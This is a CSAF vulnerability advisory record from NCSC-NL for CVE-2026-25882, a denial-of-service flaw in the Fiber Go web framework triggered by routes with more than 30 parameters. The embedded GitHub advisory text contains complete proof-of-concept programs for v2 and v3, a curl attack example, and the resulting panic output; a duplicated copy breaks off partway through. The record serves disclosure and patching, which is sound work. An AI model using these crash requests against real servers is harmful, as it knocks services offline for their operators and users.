{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-25882", "tracking": { "current_release_date": "2026-03-26T20:18:52.657478Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-25882", "initial_release_date": "2026-02-24T21:30:30.166422Z", "revision_history": [ { "date": "2026-02-24T21:30:30.166422Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-02-24T21:30:39.843840Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-02-24T21:38:50.815783Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| Products connected (1).| References created (4).| CWES updated (1)." }, { "date": "2026-02-24T21:38:54.379187Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-02-24T21:39:48.582143Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)." }, { "date": "2026-02-24T22:32:17.846127Z", "number": "6", "summary": "Description removed for source.| Description created for source." }, { "date": "2026-02-24T22:38:58.410362Z", "number": "7", "summary": "Unknown change." }, { "date": "2026-02-25T00:12:43.542914Z", "number": "8", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (2).| References created (4).| CWES updated (1)." }, { "date": "2026-02-25T11:02:45.095119Z", "number": "9", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (93).| Products created (2).| References created (6).| CWES updated (1)." }, { "date": "2026-02-25T11:02:51.547906Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-02-25T15:14:31.129780Z", "number": "11", "summary": "Source created.| CVE status created. (valid)| EPSS created." }, { "date": "2026-02-27T00:12:55.518724Z", "number": "12", "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (4)." }, { "date": "2026-02-27T00:12:57.244111Z", "number": "13", "summary": "NCSC Score updated." }, { "date": "2026-02-27T03:24:59.351962Z", "number": "14", "summary": "CVSS created.| Products connected (2).| Product Identifiers created (2).| Exploits created (1)." }, { "date": "2026-02-27T03:25:02.033718Z", "number": "15", "summary": "NCSC Score updated." }, { "date": "2026-02-27T20:39:33.352525Z", "number": "16", "summary": "References created (2)." }, { "date": "2026-02-28T06:12:59.554582Z", "number": "17", "summary": "References created (2)." }, { "date": "2026-03-02T17:01:28.910448Z", "number": "18", "summary": "Products created (7)." }, { "date": "2026-03-02T17:01:40.175823Z", "number": "19", "summary": "NCSC Score updated." }, { "date": "2026-03-03T00:27:45.275168Z", "number": "20", "summary": "Products removed (7)." }, { "date": "2026-03-20T09:45:53.075374Z", "number": "21", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-20T09:45:55.838423Z", "number": "22", "summary": "NCSC Score updated." }, { "date": "2026-03-26T18:48:01.989510Z", "number": "23", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (2).| References created (8).| CWES updated (1)." }, { "date": "2026-03-26T18:48:02.625730Z", "number": "24", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (2).| References created (8).| CWES updated (1)." }, { "date": "2026-03-26T18:48:04.807252Z", "number": "25", "summary": "NCSC Score updated." } ], "status": "interim", "version": "25" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=0|<2.52.12", "product": { "name": "vers:unknown/>=0|<2.52.12", "product_id": "CSAFPID-5700112" } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<3.1.0", "product": { "name": "vers:unknown/>=0|<3.1.0", "product_id": "CSAFPID-5700113" } }, { "category": "product_version_range", "name": "vers:unknown/>=2.0.0|<2.52.12", "product": { "name": "vers:unknown/>=2.0.0|<2.52.12", "product_id": "CSAFPID-5699784", "product_identification_helper": { "cpe": "cpe:2.3:a:gofiber:fiber:*:*:*:*:*:go:*:*" } } }, { "category": "product_version_range", "name": "vers:unknown/>=3.0.0|<3.1.0", "product": { "name": "vers:unknown/>=3.0.0|<3.1.0", "product_id": "CSAFPID-5699780", "product_identification_helper": { "cpe": "cpe:2.3:a:gofiber:fiber:*:*:*:*:*:go:*:*" } } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.0", "product": { "name": "vers:unknown/v2.0.0", "product_id": "CSAFPID-3746874" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.1", "product": { "name": "vers:unknown/v2.0.1", "product_id": "CSAFPID-3746875" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.2", "product": { "name": "vers:unknown/v2.0.2", "product_id": "CSAFPID-3746876" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.3", "product": { "name": "vers:unknown/v2.0.3", "product_id": "CSAFPID-3746877" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.4", "product": { "name": "vers:unknown/v2.0.4", "product_id": "CSAFPID-3746878" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.5", "product": { "name": "vers:unknown/v2.0.5", "product_id": "CSAFPID-3746879" } }, { "category": "product_version_range", "name": "vers:unknown/v2.0.6", "product": { "name": "vers:unknown/v2.0.6", "product_id": "CSAFPID-3746880" } }, { "category": "product_version_range", "name": "vers:unknown/v2.1.0", "product": { "name": "vers:unknown/v2.1.0", "product_id": "CSAFPID-3746881" } }, { "category": "product_version_range", "name": "vers:unknown/v2.1.1", "product": { "name": "vers:unknown/v2.1.1", "product_id": "CSAFPID-3746882" } }, { "category": "product_version_range", "name": "vers:unknown/v2.1.2", "product": { "name": "vers:unknown/v2.1.2", "product_id": "CSAFPID-3746883" } }, { "category": "product_version_range", "name": "vers:unknown/v2.1.3", "product": { "name": "vers:unknown/v2.1.3", "product_id": "CSAFPID-3746884" } }, { "category": "product_version_range", "name": "vers:unknown/v2.1.4", "product": { "name": "vers:unknown/v2.1.4", "product_id": "CSAFPID-3746885" } }, { "category": "product_version_range", "name": "vers:unknown/v2.10.0", "product": { "name": "vers:unknown/v2.10.0", "product_id": "CSAFPID-3746886" } }, { "category": "product_version_range", "name": "vers:unknown/v2.11.0", "product": { "name": "vers:unknown/v2.11.0", "product_id": "CSAFPID-3746887" } }, { "category": "product_version_range", "name": "vers:unknown/v2.12.0", "product": { "name": "vers:unknown/v2.12.0", "product_id": "CSAFPID-3746888" } }, { "category": "product_version_range", "name": "vers:unknown/v2.13.0", "product": { "name": "vers:unknown/v2.13.0", "product_id": "CSAFPID-3746889" } }, { "category": "product_version_range", "name": "vers:unknown/v2.14.0", "product": { "name": "vers:unknown/v2.14.0", "product_id": "CSAFPID-3746890" } }, { "category": "product_version_range", "name": "vers:unknown/v2.15.0", "product": { "name": "vers:unknown/v2.15.0", "product_id": "CSAFPID-3746891" } }, { "category": "product_version_range", "name": "vers:unknown/v2.16.0", "product": { "name": "vers:unknown/v2.16.0", "product_id": "CSAFPID-3746892" } }, { "category": "product_version_range", "name": "vers:unknown/v2.17.0", "product": { "name": "vers:unknown/v2.17.0", "product_id": "CSAFPID-3746893" } }, { "category": "product_version_range", "name": "vers:unknown/v2.18.0", "product": { "name": "vers:unknown/v2.18.0", "product_id": "CSAFPID-3746894" } }, { "category": "product_version_range", "name": "vers:unknown/v2.19.0", "product": { "name": "vers:unknown/v2.19.0", "product_id": "CSAFPID-3746895" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.0", "product": { "name": "vers:unknown/v2.2.0", "product_id": "CSAFPID-3746896" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.1", "product": { "name": "vers:unknown/v2.2.1", "product_id": "CSAFPID-3746897" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.2", "product": { "name": "vers:unknown/v2.2.2", "product_id": "CSAFPID-3746898" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.3", "product": { "name": "vers:unknown/v2.2.3", "product_id": "CSAFPID-3746899" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.4", "product": { "name": "vers:unknown/v2.2.4", "product_id": "CSAFPID-3746900" } }, { "category": "product_version_range", "name": "vers:unknown/v2.2.5", "product": { "name": "vers:unknown/v2.2.5", "product_id": "CSAFPID-3746901" } }, { "category": "product_version_range", "name": "vers:unknown/v2.20.0", "product": { "name": "vers:unknown/v2.20.0", "product_id": "CSAFPID-3746902" } }, { "category": "product_version_range", "name": "vers:unknown/v2.20.1", "product": { "name": "vers:unknown/v2.20.1", "product_id": "CSAFPID-3746903" } }, { "category": "product_version_range", "name": "vers:unknown/v2.20.2", "product": { "name": "vers:unknown/v2.20.2", "product_id": "CSAFPID-3746904" } }, { "category": "product_version_range", "name": "vers:unknown/v2.21.0", "product": { "name": "vers:unknown/v2.21.0", "product_id": "CSAFPID-3746905" } }, { "category": "product_version_range", "name": "vers:unknown/v2.22.0", "product": { "name": "vers:unknown/v2.22.0", "product_id": "CSAFPID-3746906" } }, { "category": "product_version_range", "name": "vers:unknown/v2.23.0", "product": { "name": "vers:unknown/v2.23.0", "product_id": "CSAFPID-3746907" } }, { "category": "product_version_range", "name": "vers:unknown/v2.24.0", "product": { "name": "vers:unknown/v2.24.0", "product_id": "CSAFPID-3746908" } }, { "category": "product_version_range", "name": "vers:unknown/v2.25.0", "product": { "name": "vers:unknown/v2.25.0", "product_id": "CSAFPID-3746909" } }, { "category": "product_version_range", "name": "vers:unknown/v2.26.0", "product": { "name": "vers:unknown/v2.26.0", "product_id": "CSAFPID-3746910" } }, { "category": "product_version_range", "name": "vers:unknown/v2.27.0", "product": { "name": "vers:unknown/v2.27.0", "product_id": "CSAFPID-3746911" } }, { "category": "product_version_range", "name": "vers:unknown/v2.28.0", "product": { "name": "vers:unknown/v2.28.0", "product_id": "CSAFPID-3746912" } }, { "category": "product_version_range", "name": "vers:unknown/v2.29.0", "product": { "name": "vers:unknown/v2.29.0", "product_id": "CSAFPID-3746913" } }, { "category": "product_version_range", "name": "vers:unknown/v2.3.0", "product": { "name": "vers:unknown/v2.3.0", "product_id": "CSAFPID-3746914" } }, { "category": "product_version_range", "name": "vers:unknown/v2.3.1", "product": { "name": "vers:unknown/v2.3.1", "product_id": "CSAFPID-3746915" } }, { "category": "product_version_range", "name": "vers:unknown/v2.3.2", "product": { "name": "vers:unknown/v2.3.2", "product_id": "CSAFPID-3746916" } }, { "category": "product_version_range", "name": "vers:unknown/v2.3.3", "product": { "name": "vers:unknown/v2.3.3", "product_id": "CSAFPID-3746917" } }, { "category": "product_version_range", "name": "vers:unknown/v2.30.0", "product": { "name": "vers:unknown/v2.30.0", "product_id": "CSAFPID-3746918" } }, { "category": "product_version_range", "name": "vers:unknown/v2.31.0", "product": { "name": "vers:unknown/v2.31.0", "product_id": "CSAFPID-3746919" } }, { "category": "product_version_range", "name": "vers:unknown/v2.32.0", "product": { "name": "vers:unknown/v2.32.0", "product_id": "CSAFPID-3746920" } }, { "category": "product_version_range", "name": "vers:unknown/v2.33.0", "product": { "name": "vers:unknown/v2.33.0", "product_id": "CSAFPID-3746921" } }, { "category": "product_version_range", "name": "vers:unknown/v2.34.0", "product": { "name": "vers:unknown/v2.34.0", "product_id": "CSAFPID-3746922" } }, { "category": "product_version_range", "name": "vers:unknown/v2.34.0-rc.1", "product": { "name": "vers:unknown/v2.34.0-rc.1", "product_id": "CSAFPID-3746923" } }, { "category": "product_version_range", "name": "vers:unknown/v2.34.1", "product": { "name": "vers:unknown/v2.34.1", "product_id": "CSAFPID-3746924" } }, { "category": "product_version_range", "name": "vers:unknown/v2.35.0", "product": { "name": "vers:unknown/v2.35.0", "product_id": "CSAFPID-3746925" } }, { "category": "product_version_range", "name": "vers:unknown/v2.36.0", "product": { "name": "vers:unknown/v2.36.0", "product_id": "CSAFPID-3746926" } }, { "category": "product_version_range", "name": "vers:unknown/v2.37.0", "product": { "name": "vers:unknown/v2.37.0", "product_id": "CSAFPID-3746927" } }, { "category": "product_version_range", "name": "vers:unknown/v2.37.0-rc.1", "product": { "name": "vers:unknown/v2.37.0-rc.1", "product_id": "CSAFPID-3746928" } }, { "category": "product_version_range", "name": "vers:unknown/v2.37.1", "product": { "name": "vers:unknown/v2.37.1", "product_id": "CSAFPID-3746929" } }, { "category": "product_version_range", "name": "vers:unknown/v2.38.0", "product": { "name": "vers:unknown/v2.38.0", "product_id": "CSAFPID-3746930" } }, { "category": "product_version_range", "name": "vers:unknown/v2.38.1", "product": { "name": "vers:unknown/v2.38.1", "product_id": "CSAFPID-3746931" } }, { "category": "product_version_range", "name": "vers:unknown/v2.39.0", "product": { "name": "vers:unknown/v2.39.0", "product_id": "CSAFPID-3746932" } }, { "category": "product_version_range", "name": "vers:unknown/v2.4.0", "product": { "name": "vers:unknown/v2.4.0", "product_id": "CSAFPID-3746933" } }, { "category": "product_version_range", "name": "vers:unknown/v2.4.1", "product": { "name": "vers:unknown/v2.4.1", "product_id": "CSAFPID-3746934" } }, { "category": "product_version_range", "name": "vers:unknown/v2.40.0", "product": { "name": "vers:unknown/v2.40.0", "product_id": "CSAFPID-3746935" } }, { "category": "product_version_range", "name": "vers:unknown/v2.40.1", "product": { "name": "vers:unknown/v2.40.1", "product_id": "CSAFPID-3746936" } }, { "category": "product_version_range", "name": "vers:unknown/v2.41.0", "product": { "name": "vers:unknown/v2.41.0", "product_id": "CSAFPID-3746937" } }, { "category": "product_version_range", "name": "vers:unknown/v2.42.0", "product": { "name": "vers:unknown/v2.42.0", "product_id": "CSAFPID-3746938" } }, { "category": "product_version_range", "name": "vers:unknown/v2.43.0", "product": { "name": "vers:unknown/v2.43.0", "product_id": "CSAFPID-3746939" } }, { "category": "product_version_range", "name": "vers:unknown/v2.44.0", "product": { "name": "vers:unknown/v2.44.0", "product_id": "CSAFPID-3746940" } }, { "category": "product_version_range", "name": "vers:unknown/v2.45.0", "product": { "name": "vers:unknown/v2.45.0", "product_id": "CSAFPID-3746941" } }, { "category": "product_version_range", "name": "vers:unknown/v2.46.0", "product": { "name": "vers:unknown/v2.46.0", "product_id": "CSAFPID-3746942" } }, { "category": "product_version_range", "name": "vers:unknown/v2.47.0", "product": { "name": "vers:unknown/v2.47.0", "product_id": "CSAFPID-3746943" } }, { "category": "product_version_range", "name": "vers:unknown/v2.48.0", "product": { "name": "vers:unknown/v2.48.0", "product_id": "CSAFPID-3746944" } }, { "category": "product_version_range", "name": "vers:unknown/v2.49.0", "product": { "name": "vers:unknown/v2.49.0", "product_id": "CSAFPID-3746945" } }, { "category": "product_version_range", "name": "vers:unknown/v2.49.1", "product": { "name": "vers:unknown/v2.49.1", "product_id": "CSAFPID-3746946" } }, { "category": "product_version_range", "name": "vers:unknown/v2.49.2", "product": { "name": "vers:unknown/v2.49.2", "product_id": "CSAFPID-3746947" } }, { "category": "product_version_range", "name": "vers:unknown/v2.5.0", "product": { "name": "vers:unknown/v2.5.0", "product_id": "CSAFPID-3746948" } }, { "category": "product_version_range", "name": "vers:unknown/v2.50.0", "product": { "name": "vers:unknown/v2.50.0", "product_id": "CSAFPID-3746949" } }, { "category": "product_version_range", "name": "vers:unknown/v2.51.0", "product": { "name": "vers:unknown/v2.51.0", "product_id": "CSAFPID-3746950" } }, { "category": "product_version_range", "name": "vers:unknown/v2.52.0", "product": { "name": "vers:unknown/v2.52.0", "product_id": "CSAFPID-3746951" } }, { "category": "product_version_range", "name": "vers:unknown/v2.52.1", "product": { "name": "vers:unknown/v2.52.1", "product_id": "CSAFPID-3746952" } }, { "category": "product_version_range", "name": "vers:unknown/v2.52.10", "product": { "name": "vers:unknown/v2.52.10", "product_id": "CSAFPID-5586939" } }, { "category": "product_version_range", "name": "vers:unknown/v2.52.11", "product": { "name": "vers:unknown/v2.52.11", "product_id": "CSAFPID-5702051" } }, { "category": "product_version_range", "name": "vers:unknown/v2.52.2", "product": { "name": "vers:unknown/v2.52.2", "product_id": "CSAFPID-3746953" } }, { "category": "product_version_range", "name": "vers:unknown/v2.52.3", "product": { "name": "vers:unknown/v2.52.3", "product_id": "CSAFPID-3746954" } }, { "category": "product_version_range", "name": "vers:unknown/v2.52.4", "product": { "name": "vers:unknown/v2.52.4", "product_id": "CSAFPID-3746955" } }, { "category": "product_version_range", "name": "vers:unknown/v2.52.5", "product": { "name": "vers:unknown/v2.52.5", "product_id": "CSAFPID-3746956" } }, { "category": "product_version_range", "name": "vers:unknown/v2.52.6", "product": { "name": "vers:unknown/v2.52.6", "product_id": "CSAFPID-3746957" } }, { "category": "product_version_range", "name": "vers:unknown/v2.52.7", "product": { "name": "vers:unknown/v2.52.7", "product_id": "CSAFPID-5081894" } }, { "category": "product_version_range", "name": "vers:unknown/v2.52.8", "product": { "name": "vers:unknown/v2.52.8", "product_id": "CSAFPID-5081895" } }, { "category": "product_version_range", "name": "vers:unknown/v2.52.9", "product": { "name": "vers:unknown/v2.52.9", "product_id": "CSAFPID-5586940" } }, { "category": "product_version_range", "name": "vers:unknown/v2.6.0", "product": { "name": "vers:unknown/v2.6.0", "product_id": "CSAFPID-3746958" } }, { "category": "product_version_range", "name": "vers:unknown/v2.7.0", "product": { "name": "vers:unknown/v2.7.0", "product_id": "CSAFPID-3746959" } }, { "category": "product_version_range", "name": "vers:unknown/v2.7.1", "product": { "name": "vers:unknown/v2.7.1", "product_id": "CSAFPID-3746960" } }, { "category": "product_version_range", "name": "vers:unknown/v2.8.0", "product": { "name": "vers:unknown/v2.8.0", "product_id": "CSAFPID-3746961" } }, { "category": "product_version_range", "name": "vers:unknown/v2.9.0", "product": { "name": "vers:unknown/v2.9.0", "product_id": "CSAFPID-3746962" } }, { "category": "product_version_range", "name": "vers:unknown/v3.0.0", "product": { "name": "vers:unknown/v3.0.0", "product_id": "CSAFPID-5702052" } } ], "category": "product_name", "name": "Fiber" } ], "category": "vendor", "name": "Gofiber" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/2.52.12", "product": { "name": "vers:unknown/2.52.12", "product_id": "CSAFPID-5918984" } }, { "category": "product_version_range", "name": "vers:unknown/<2.52.12", "product": { "name": "vers:unknown/<2.52.12", "product_id": "CSAFPID-5918985" } } ], "category": "product_name", "name": "go/github.com/gofiber/fiber/v2" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/3.1.0", "product": { "name": "vers:unknown/3.1.0", "product_id": "CSAFPID-5918986" } }, { "category": "product_version_range", "name": "vers:unknown/<3.1.0", "product": { "name": "vers:unknown/<3.1.0", "product_id": "CSAFPID-5918987" } } ], "category": "product_name", "name": "go/github.com/gofiber/fiber/v3" } ], "category": "vendor", "name": "fiber" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-25882", "cwe": { "id": "CWE-129", "name": "Improper Validation of Array Index" }, "notes": [ { "category": "description", "text": "Fiber is an Express inspired web framework written in Go. A denial of service vulnerability exists in Fiber v2 and v3 that allows remote attackers to crash the application by sending requests to routes with more than 30 parameters. The vulnerability results from missing validation during route registration combined with an unbounded array write during request matching. Version 2.52.12 patches the issue in the v2 branch and 3.1.0 patches the issue in the v3 branch.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-25882" }, { "category": "description", "text": "A denial of service vulnerability exists in Fiber v2 and v3 that allows remote attackers to crash the application by sending requests to routes with more than 30 parameters. The vulnerability results from missing validation during route registration combined with an unbounded array write during request matching.\n\n## Affected Versions\n\n- **Fiber v3.0.0-rc.3** and earlier v3 releases\n- **Fiber v2.52.10** and potentially all v2 releases (confirmed exploitable)\n- Both versions share the same vulnerable routing implementation\n\n## Vulnerability Details\n\n### Root Cause\n\nBoth Fiber v2 and v3 define a fixed-size parameter array in `ctx.go`:\n\n```go\nconst maxParams = 30\n\ntype DefaultCtx struct {\n values [maxParams]string // Fixed 30-element array\n // ...\n}\n```\n\nThe `router.go` `register()` function accepts routes without validating parameter count. When a request matches a route exceeding 30 parameters, the code in `path.go` performs an unbounded write:\n\n- **v3**: `path.go:514`\n- **v2**: `path.go:516`\n\n```go\n// path.go:514 - NO BOUNDS CHECKING\nparams[paramsIterator] = path[:i]\n```\n\nWhen `paramsIterator >= 30`, this triggers:\n```\npanic: runtime error: index out of range [30] with length 30\n```\n\n### Attack Scenario\n\n1. Application registers route with >30 parameters (e.g., via code or dynamic routing):\n ```go\n app.Get(\"/api/:p1/:p2/:p3/.../p35\", handler)\n ```\n\n2. Attacker sends matching HTTP request:\n ```bash\n curl http://target/api/v1/v2/v3/.../v35\n ```\n\n3. Server crashes during request processing with runtime panic\n\n## Proof of Concept\n\n### For Fiber v3\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"net/http\"\n\t\"time\"\n\t\"github.com/gofiber/fiber/v3\"\n)\n\nfunc main() {\n\tapp := fiber.New()\n\t\n\t// Register route with 35 parameters (exceeds maxParams=30)\n\tpath := \"/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\tpath += fmt.Sprintf(\"/:p%d\", i)\n\t}\n\t\n\tfmt.Printf(\"Registering route: %s...\\n\", path[:50]+\"...\")\n\tapp.Get(path, func(c fiber.Ctx) error {\n\t\treturn c.SendString(\"Never reached\")\n\t})\n\tfmt.Println(\"āœ“ Registration succeeded (NO PANIC)\")\n\t\n\tgo func() {\n\t\tapp.Listen(\":9999\")\n\t}()\n\ttime.Sleep(200 * time.Millisecond)\n\t\n\t// Build exploit URL with 35 parameter values\n\turl := \"http://localhost:9999/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\turl += fmt.Sprintf(\"/v%d\", i)\n\t}\n\t\n\tfmt.Println(\"\\nšŸ”“ Sending exploit request...\")\n\tfmt.Println(\"Expected: panic at path.go:514 params[paramsIterator] = path[:i]\\n\")\n\t\n\tresp, err := http.Get(url)\n\tif err != nil {\n\t\tfmt.Printf(\"āœ— Request failed: %v\\n\", err)\n\t\tfmt.Println(\"šŸ’„ Server crashed!\")\n\t} else {\n\t\tfmt.Printf(\"Response: %d\\n\", resp.StatusCode)\n\t\tresp.Body.Close()\n\t}\n}\n```\n\n**Output:**\n```\nRegistering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...\nāœ“ Registration succeeded (NO PANIC)\n\nšŸ”“ Sending exploit request...\nExpected: panic at path.go:514 params[paramsIterator] = path[:i]\n\npanic: runtime error: index out of range [30] with length 30\n\ngoroutine 40 [running]:\ngithub.com/gofiber/fiber/v3.(*routeParser).getMatch(...)\n\t/path/to/fiber/path.go:514\ngithub.com/gofiber/fiber/v3.(*Route).match(...)\n\t/path/to/fiber/router.go:89\ngithub.com/gofiber/fiber/v3.(*App).next(...)\n\t/path/to/fiber/router.go:142\n```\n\n### For Fiber v2\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"net/http\"\n\t\"time\"\n\t\"github.com/gofiber/fiber/v2\"\n)\n\nfunc main() {\n\tapp := fiber.New()\n\t\n\t// Register route with 35 parameters (exceeds maxParams=30)\n\tpath := \"/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\tpath += fmt.Sprintf(\"/:p%d\", i)\n\t}\n\t\n\tfmt.Printf(\"Registering route: %s...\\n\", path[:50]+\"...\")\n\tapp.Get(path, func(c *fiber.Ctx) error {\n\t\treturn c.SendString(\"Never reached\")\n\t})\n\tfmt.Println(\"āœ“ Registration succeeded (NO PANIC)\")\n\t\n\tgo func() {\n\t\tapp.Listen(\":9998\")\n\t}()\n\ttime.Sleep(200 * time.Millisecond)\n\t\n\t// Build exploit URL with 35 parameter values\n\turl := \"http://localhost:9998/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\turl += fmt.Sprintf(\"/v%d\", i)\n\t}\n\t\n\tfmt.Println(\"\\nšŸ”“ Sending exploit request...\")\n\tfmt.Println(\"Expected: panic at path.go:516 params[paramsIterator] = path[:i]\\n\")\n\t\n\tresp, err := http.Get(url)\n\tif err != nil {\n\t\tfmt.Printf(\"āœ— Request failed: %v\\n\", err)\n\t\tfmt.Println(\"šŸ’„ Server crashed!\")\n\t} else {\n\t\tfmt.Printf(\"Response: %d\\n\", resp.StatusCode)\n\t\tresp.Body.Close()\n\t}\n}\n```\n\n**Output (v2):**\n```\nRegistering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...\nāœ“ Registration succeeded (NO PANIC)\n\nšŸ”“ Sending exploit request...\nExpected: panic at path.go:516 params[paramsIterator] = path[:i]\n\npanic: runtime error: index out of range [30] with length 30\n\ngoroutine 40 [running]:\ngithub.com/gofiber/fiber/v2.(*routeParser).getMatch(...)\n\t/path/to/fiber/v2@v2.52.10/path.go:512\ngithub.com/gofiber/fiber/v2.(*Route).match(...)\n\t/path/to/fiber/v2@v2.52.10/router.go:84\ngithub.com/gofiber/fiber/v2.(*App).next(...)\n\t/path/to/fiber/v2@v2.52.10/router.go:127\n```\n\n## Impact\n\n### Exploitation Requirements\n- No authentication required\n- Single HTTP request triggers crash\n- Trivially scriptable for sustained DoS\n- Works against any route with >30 parameters\n\n### Real-World Impact\n- **Public APIs**: Remote DoS attacks on vulnerable endpoints\n- **Microservices**: Cascade failures if vulnerable service is critical\n- **Auto-scaling**: Repeated crashes prevent proper recovery\n- **Monitoring**: Log flooding and alert fatigue\n\n### Likelihood\n**HIGH** - Exploitation requires only:\n- Knowledge of route structure (often public in APIs)\n- Standard HTTP client (curl, browser, etc.)\n- Single malformed request\n\n## Workarounds\n\nUntil patched, users should:\n\n1. **Audit Routes**: Ensure all routes have ā‰¤30 parameters\n ```bash\n # Search for potential issues\n grep -r \"/:.*/:.*/:.*\" . | grep -v node_modules\n ```\n\n2. **Disable Dynamic Routing**: If programmatically registering routes, validate parameter count:\n ```go\n paramCount := strings.Count(route, \":\")\n if paramCount > 30 {\n log.Fatal(\"Route exceeds maxParams\")\n }\n ```\n\n3. **Rate Limiting**: Deploy aggressive rate limiting to mitigate DoS impact\n\n4. **Monitoring**: Alert on panic patterns in application logs\n\n## Timeline\n\n- **2024-12-24**: Vulnerability discovered in v3 during PR #3962 review\n- **2024-12-25**: Proof of concept confirmed exploitability in v3\n- **2024-12-25**: Vulnerability confirmed to also exist in v2 (same root cause)\n- **2024-12-25**: Security advisory created\n\n## References\n\n- **v3 Related PR**: https://github.com/gofiber/fiber/pull/3962 (UpdateParam feature with defensive checks, doesn't fix root cause)\n- **Vulnerable Code Locations**:\n - v3: [path.go:514](https://github.com/gofiber/fiber/blob/main/path.go#L514)\n - v2: [path.go:516](https://github.com/gofiber/fiber/blob/v2/path.go#L516)\n\n## Credit\n\n**Discovered by:** @sixcolors (Fiber maintainer) and @TheAspectDev", "title": "github - https://github.com/advisories/GHSA-mrq8-rjmw-wpq3" }, { "category": "description", "text": "Fiber is an Express inspired web framework written in Go. A denial of service vulnerability exists in Fiber v2 and v3 that allows remote attackers to crash the application by sending requests to routes with more than 30 parameters. The vulnerability results from missing validation during route registration combined with an unbounded array write during request matching. Version 2.52.12 patches the issue in the v2 branch and 3.1.0 patches the issue in the v3 branch.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-25882" }, { "category": "description", "text": "A denial of service vulnerability exists in Fiber v2 and v3 that allows remote attackers to crash the application by sending requests to routes with more than 30 parameters. The vulnerability results from missing validation during route registration combined with an unbounded array write during request matching.\n\n## Affected Versions\n\n- **Fiber v3.0.0-rc.3** and earlier v3 releases\n- **Fiber v2.52.10** and potentially all v2 releases (confirmed exploitable)\n- Both versions share the same vulnerable routing implementation\n\n## Vulnerability Details\n\n### Root Cause\n\nBoth Fiber v2 and v3 define a fixed-size parameter array in `ctx.go`:\n\n```go\nconst maxParams = 30\n\ntype DefaultCtx struct {\n values [maxParams]string // Fixed 30-element array\n // ...\n}\n```\n\nThe `router.go` `register()` function accepts routes without validating parameter count. When a request matches a route exceeding 30 parameters, the code in `path.go` performs an unbounded write:\n\n- **v3**: `path.go:514`\n- **v2**: `path.go:516`\n\n```go\n// path.go:514 - NO BOUNDS CHECKING\nparams[paramsIterator] = path[:i]\n```\n\nWhen `paramsIterator >= 30`, this triggers:\n```\npanic: runtime error: index out of range [30] with length 30\n```\n\n### Attack Scenario\n\n1. Application registers route with >30 parameters (e.g., via code or dynamic routing):\n ```go\n app.Get(\"/api/:p1/:p2/:p3/.../p35\", handler)\n ```\n\n2. Attacker sends matching HTTP request:\n ```bash\n curl http://target/api/v1/v2/v3/.../v35\n ```\n\n3. Server crashes during request processing with runtime panic\n\n## Proof of Concept\n\n### For Fiber v3\n\n```go\npackage main\n\nimport 